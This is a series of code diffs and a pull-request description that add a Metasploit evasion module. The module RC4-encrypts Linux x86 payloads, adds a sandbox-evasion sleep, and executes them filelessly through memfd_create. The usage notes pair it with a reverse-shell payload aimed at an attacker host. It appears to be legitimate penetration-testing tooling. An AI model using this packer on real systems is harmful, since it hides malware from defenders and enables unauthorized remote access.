+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86],
+        'Targets' => [['Linux x86', {}]],
+        'DefaultTarget' => 0
       )
     )
 
@@ -40,18 +40,16 @@ class MetasploitModule < Msf::Evasion
   end
 
   def run
-
     raw_payload = payload.encoded
     if raw_payload.blank?
-      fail_with(Failure::BadConfig, "Failed to generate payload")
+      fail_with(Failure::BadConfig, 'Failed to generate payload')
     end
-    
+
     elf_payload = Msf::Util::EXE.to_linux_x86_elf(framework, raw_payload)
-    complete_loader = sleep_evasion( seconds: datastore['SLEEP_TIME']) + rc4_decrypter(data: (in_memory_load(elf_payload) + elf_payload))
+    complete_loader = sleep_evasion(seconds: datastore['SLEEP_TIME']) + rc4_decrypter(data: (in_memory_load(elf_payload) + elf_payload))
     final_elf = Msf::Util::EXE.to_linux_x86_elf(framework, complete_loader)
 
     File.binwrite(datastore['FILENAME'], final_elf)
-    File.chmod(0755, datastore['FILENAME'])
-    
+    File.chmod(0o755, datastore['FILENAME'])
   end
 end

--- a/modules/evasion/linux/x86_rc4_packer.rb
+++ b/modules/evasion/linux/x86_rc4_packer.rb
@@ -1,0 +1,55 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Evasion
+
+  include Msf::Payload::Linux::X86::Rc4Decrypter
+  include Msf::Payload::Linux::X86::ElfLoader
+  include Msf::Payload::Linux::X86::SleepEvasion
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Linux RC4 Packer with In-Memory Execution (x86)',
+        'Description'    => %q{
+          This evasion module packs Linux payloads using RC4 encryption
+          and executes them from memory using memfd_create for fileless execution.
+          
+          Features:
+          - RC4 encryption with configurable key size
+          - Fileless execution via memfd_create
+        },
+        'Author'         => ['Massimo Bertocchi'],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'linux',
+        'Arch'           => [ARCH_X86],
+        'Targets'        => [['Linux x86', {}]],
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output filename', 'payload.elf']),
+      OptInt.new('SLEEP_TIME', [false, 'Sleep Time for Sandbox Evasion', 0]),
+    ])
+  end
+
+  def run
+
+    raw_payload = payload.encoded
+    unless raw_payload && raw_payload.length > 0
+      fail_with(Failure::BadConfig, "Failed to generate payload")
+    end
+    
+    elf_payload = Msf::Util::EXE.to_linux_x86_elf(framework, raw_payload)
+    complete_loader = sleep_evasion( seconds: datastore['SLEEP_TIME']) + rc4_decrypter(data: (in_memory_load(elf_payload) + elf_payload))
+    final_elf = Msf::Util::EXE.to_linux_x86_elf(framework, complete_loader)
+
+    File.binwrite(datastore['FILENAME'], final_elf)
+    File.chmod(0755, datastore['FILENAME'])
+    
+  end
+end

--- a/modules/evasion/linux/x86_rc4_packer.rb
+++ b/modules/evasion/linux/x86_rc4_packer.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Evasion
   def run
 
     raw_payload = payload.encoded
-    unless raw_payload && raw_payload.length > 0
+    if raw_payload.blank?
       fail_with(Failure::BadConfig, "Failed to generate payload")
     end
     

--- a/modules/evasion/linux/x86_rc4_packer.rb
+++ b/modules/evasion/linux/x86_rc4_packer.rb
@@ -18,6 +18,8 @@ class MetasploitModule < Msf::Evasion
           This evasion module packs Linux payloads using RC4 encryption
           and executes them from memory using memfd_create for fileless execution.
           
+          The evasion module works on systems with Linux Kernel > 3.17 due to memfd_create support.
+          
           Features:
           - RC4 encryption with configurable key size
           - Fileless execution via memfd_create


### PR DESCRIPTION
## Description

This PR introduces an x86 Linux payload packer that encrypts the generated payload with RC4, prepends an optional sleep-based delay (nanosleep), and decrypts/executes the payload at runtime via a compact precompiled stub.

### What’s included

 - x86 RC4 packer (Evasion Linux Module)
 - x86 sleep evasion prepend (Mixin)
 - x86 RC4 decryption stub (Mixin)

### How to use it - BASIC
- use evasion/linux/x86_rc4_packer
- set payload linux/x86/shell_reverse_tcp
- set LHOST x.x.x.x
- run

### Optional
- set SLEEP_TIME x
